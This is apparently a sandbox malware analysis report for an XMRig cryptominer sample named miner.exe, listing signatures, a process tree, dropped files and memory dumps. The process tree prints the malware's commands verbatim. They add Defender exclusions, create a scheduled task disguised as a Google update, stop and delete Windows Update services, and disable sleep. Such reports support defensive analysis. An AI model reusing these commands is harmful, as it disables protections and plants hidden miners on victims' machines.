Resubmissions

15/03/2023, 13:53

230315-q643jafe6v 10

15/03/2023, 09:34

230315-lj1pdace58 10

Analysis

  • max time kernel
    1801s
  • max time network
    1797s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/03/2023, 13:53

General

  • Target

    miner.exe

  • Size

    54.5MB

  • MD5

    32e15387bdd65fe68b35718dd1b1b98f

  • SHA1

    d281b428c3d2e59c7d954308301822d9b3aa1409

  • SHA256

    dc2f5e27627750e63f24617303ed5b38841903ff3f32d98c55fe3a36d462064d

  • SHA512

    086b83aa2e1a999c946f3f62389dcb11e8ed76f70a974ba897ddbac9dd1d98a787a96fae3966934a6e3c7360ec50e1f5f73bff160790ef193371d1bb5b2cca38

  • SSDEEP

    786432:B1eGBQ0ZEtS6joZiVoJZmeL0W0SxaH+hnJIa53D7:B1JG0ZEtS68iVoJZmeL0WpX5

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3232
      • C:\Users\Admin\AppData\Local\Temp\miner.exe
        "C:\Users\Admin\AppData\Local\Temp\miner.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uywolgyx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4004
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4708
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4360
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4852
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:832
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1668
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1736
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4144
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:3428
        • C:\Windows\System32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:1952
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:8
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:4436
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:3636
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
              3⤵
                PID:1824
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:1196
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eakmr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2496
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:3188
                • C:\Windows\System32\cmd.exe
                  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\miner.exe"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1028
                  • C:\Windows\System32\choice.exe
                    choice /C Y /N /D Y /T 3
                    3⤵
                      PID:3304
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    2⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4640
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5036
                    • C:\Windows\System32\sc.exe
                      sc stop UsoSvc
                      3⤵
                      • Launches sc.exe
                      PID:992
                    • C:\Windows\System32\sc.exe
                      sc stop WaaSMedicSvc
                      3⤵
                      • Launches sc.exe
                      PID:4440
                    • C:\Windows\System32\sc.exe
                      sc stop wuauserv
                      3⤵
                      • Launches sc.exe
                      PID:4912
                    • C:\Windows\System32\sc.exe
                      sc stop bits
                      3⤵
                      • Launches sc.exe
                      PID:4412
                    • C:\Windows\System32\sc.exe
                      sc stop dosvc
                      3⤵
                      • Launches sc.exe
                      PID:348
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                      3⤵
                        PID:2092
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        3⤵
                          PID:3428
                        • C:\Windows\System32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                          3⤵
                            PID:2528
                          • C:\Windows\System32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                            3⤵
                              PID:1284
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              3⤵
                                PID:1924
                            • C:\Windows\System32\cmd.exe
                              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5000
                              • C:\Windows\System32\powercfg.exe
                                powercfg /x -hibernate-timeout-ac 0
                                3⤵
                                  PID:4476
                                • C:\Windows\System32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  3⤵
                                    PID:216
                                  • C:\Windows\System32\powercfg.exe
                                    powercfg /x -standby-timeout-ac 0
                                    3⤵
                                      PID:720
                                    • C:\Windows\System32\powercfg.exe
                                      powercfg /x -standby-timeout-dc 0
                                      3⤵
                                        PID:4188
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uywolgyx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                      2⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4356
                                    • C:\Windows\System32\conhost.exe
                                      C:\Windows\System32\conhost.exe xicfnjkgvnuq
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1380
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                        3⤵
                                        • Drops file in Program Files directory
                                        PID:3040
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      2⤵
                                      • Drops file in Program Files directory
                                      • Suspicious use of WriteProcessMemory
                                      PID:788
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic PATH Win32_VideoController GET Name, VideoProcessor
                                        3⤵
                                          PID:4880
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe vhhxmiksbqktnsaz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe1l3DBXa7sxhWwIMFBxMbqqEyEwxrZlgxdeZtwnBWttvfHW0XeoaG6LLmvwqjqmOyjLvCLJ8gj+J+Owk6hICmrcUEltE4QURRnXZTzB2hyTHbWQT9uicC1dVkB1sQcFcIJGu32TwpomaSst87VYPw2OaEtODxNDL7XSFyILleH6rfTJk+kB2n4FC5s+PTCFzoWlKD2bDRS4h04kgg0GAqKM2/ah4gM/UDf1/od/1GIoCY9g2DKAgREBgxFY6mbgTGKEdeeWR24Offsm1jTzW3WKOLSaqIJxRqtkqP/G6ovvxFgpLfvQ0lVbW2hsBE9stHKCA2L0OTNPFi1fHGVGj/d736mGWcjluLVOr8ku9+SHiwUSklk8q5S+AlQ+70mDaI/Q1p38DLz60oUqYi/UgqG+gqrxvIGGq1kC7mFFn7KPYd0Z1v+igTH0rwn+M+kVxfXWrtJZGazs/oFp9L4qjdTCAoElZTcf+lEpnq4WqeXNImLlR9ysAGmpjNXczEL23E
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1336
                                    • C:\Program Files\Google\Chrome\updater.exe
                                      "C:\Program Files\Google\Chrome\updater.exe"
                                      1⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Drops file in Program Files directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:2488

                                    Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\Google\Chrome\updater.exe

                                            Filesize

                                            54.5MB

                                            MD5

                                            32e15387bdd65fe68b35718dd1b1b98f

                                            SHA1

                                            d281b428c3d2e59c7d954308301822d9b3aa1409

                                            SHA256

                                            dc2f5e27627750e63f24617303ed5b38841903ff3f32d98c55fe3a36d462064d

                                            SHA512

                                            086b83aa2e1a999c946f3f62389dcb11e8ed76f70a974ba897ddbac9dd1d98a787a96fae3966934a6e3c7360ec50e1f5f73bff160790ef193371d1bb5b2cca38

                                          • C:\Program Files\Google\Chrome\updater.exe

                                            Filesize

                                            54.5MB

                                            MD5

                                            32e15387bdd65fe68b35718dd1b1b98f

                                            SHA1

                                            d281b428c3d2e59c7d954308301822d9b3aa1409

                                            SHA256

                                            dc2f5e27627750e63f24617303ed5b38841903ff3f32d98c55fe3a36d462064d

                                            SHA512

                                            086b83aa2e1a999c946f3f62389dcb11e8ed76f70a974ba897ddbac9dd1d98a787a96fae3966934a6e3c7360ec50e1f5f73bff160790ef193371d1bb5b2cca38

                                          • C:\Program Files\Google\Libs\g.log

                                            Filesize

                                            226B

                                            MD5

                                            fdba80d4081c28c65e32fff246dc46cb

                                            SHA1

                                            74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                            SHA256

                                            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                            SHA512

                                            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            d85ba6ff808d9e5444a4b369f5bc2730

                                            SHA1

                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                            SHA256

                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                            SHA512

                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            d28a889fd956d5cb3accfbaf1143eb6f

                                            SHA1

                                            157ba54b365341f8ff06707d996b3635da8446f7

                                            SHA256

                                            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                            SHA512

                                            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            8c76dee4a40be03f3f96d194341d5853

                                            SHA1

                                            d4c4e0e9fe3ae23dcb438369d773822ca7393379

                                            SHA256

                                            271270743045d98c3b6da92d5a846e395a325394791ae4169c402668827c24cb

                                            SHA512

                                            d1052ecd7500a5082aeb5ba4e48ac491a3d1c7a817a9a93015003b62175145360b68de2e377c8b5dd018e9dbf0f4050ce8235e2eab5633c75dd2525cbd3394eb

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xqmsz4mn.twz.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            4KB

                                            MD5

                                            bdb25c22d14ec917e30faf353826c5de

                                            SHA1

                                            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                            SHA256

                                            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                            SHA512

                                            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            b42c70c1dbf0d1d477ec86902db9e986

                                            SHA1

                                            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                            SHA256

                                            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                            SHA512

                                            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                          • memory/112-147-0x0000026314FB0000-0x0000026314FC0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/112-146-0x000002632EBD0000-0x000002632EDEC000-memory.dmp

                                            Filesize

                                            2.1MB

                                          • memory/112-140-0x000002632EF20000-0x000002632EF42000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/112-180-0x0000026314FB0000-0x0000026314FC0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/396-133-0x00007FF759CC0000-0x00007FF75D34A000-memory.dmp

                                            Filesize

                                            54.5MB

                                          • memory/396-164-0x00007FF759CC0000-0x00007FF75D34A000-memory.dmp

                                            Filesize

                                            54.5MB

                                          • memory/1336-275-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-281-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-313-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-311-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-309-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-307-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-305-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-303-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-301-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-299-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-297-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-295-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-293-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-291-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-289-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-287-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-285-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-283-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-279-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-277-0x000001E38EFA0000-0x000001E38EFC0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-276-0x000001E38EF80000-0x000001E38EFA0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-273-0x000001E38EFA0000-0x000001E38EFC0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-272-0x000001E38EF80000-0x000001E38EFA0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-271-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-269-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-248-0x000001E38ED90000-0x000001E38EDB0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-267-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-249-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-250-0x000001E38EF40000-0x000001E38EF80000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/1336-265-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-252-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-253-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-255-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-263-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-257-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-258-0x000001E38EF80000-0x000001E38EFA0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1336-260-0x00007FF734E70000-0x00007FF735664000-memory.dmp

                                            Filesize

                                            8.0MB

                                          • memory/1336-261-0x000001E38EF80000-0x000001E38EFA0000-memory.dmp

                                            Filesize

                                            128KB

                                          • memory/1380-251-0x00007FF724530000-0x00007FF724546000-memory.dmp

                                            Filesize

                                            88KB

                                          • memory/1380-256-0x00007FF724530000-0x00007FF724546000-memory.dmp

                                            Filesize

                                            88KB

                                          • memory/2488-247-0x00007FF7A2600000-0x00007FF7A5C8A000-memory.dmp

                                            Filesize

                                            54.5MB

                                          • memory/2488-181-0x00007FF7A2600000-0x00007FF7A5C8A000-memory.dmp

                                            Filesize

                                            54.5MB

                                          • memory/2488-224-0x00007FF7A2600000-0x00007FF7A5C8A000-memory.dmp

                                            Filesize

                                            54.5MB

                                          • memory/2496-177-0x000001FBF5670000-0x000001FBF5680000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/2496-176-0x000001FBF5670000-0x000001FBF5680000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/2496-175-0x000001FBF5670000-0x000001FBF5680000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4004-160-0x0000022D64430000-0x0000022D64440000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4004-161-0x0000022D64430000-0x0000022D64440000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4004-159-0x0000022D64430000-0x0000022D64440000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-227-0x00000207E03B0000-0x00000207E03C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-225-0x00000207E03B0000-0x00000207E03C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-237-0x00007FF4071C0000-0x00007FF4071D0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-226-0x00000207E03B0000-0x00000207E03C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-238-0x00000207E03B0000-0x00000207E03C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4356-239-0x00000207E03B0000-0x00000207E03C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4640-209-0x0000016E43D40000-0x0000016E43D46000-memory.dmp

                                            Filesize

                                            24KB

                                          • memory/4640-208-0x0000016E43D10000-0x0000016E43D18000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/4640-207-0x0000016E43D60000-0x0000016E43D7A000-memory.dmp

                                            Filesize

                                            104KB

                                          • memory/4640-206-0x0000016E43D00000-0x0000016E43D0A000-memory.dmp

                                            Filesize

                                            40KB

                                          • memory/4640-205-0x0000016E43D20000-0x0000016E43D3C000-memory.dmp

                                            Filesize

                                            112KB

                                          • memory/4640-204-0x0000016E43BB0000-0x0000016E43BBA000-memory.dmp

                                            Filesize

                                            40KB

                                          • memory/4640-202-0x0000016E42D60000-0x0000016E42D70000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4640-203-0x0000016E42D60000-0x0000016E42D70000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4640-201-0x0000016E42D60000-0x0000016E42D70000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/4640-200-0x0000016E43AD0000-0x0000016E43AEC000-memory.dmp

                                            Filesize

                                            112KB

                                          • memory/4640-210-0x0000016E43D50000-0x0000016E43D5A000-memory.dmp

                                            Filesize

                                            40KB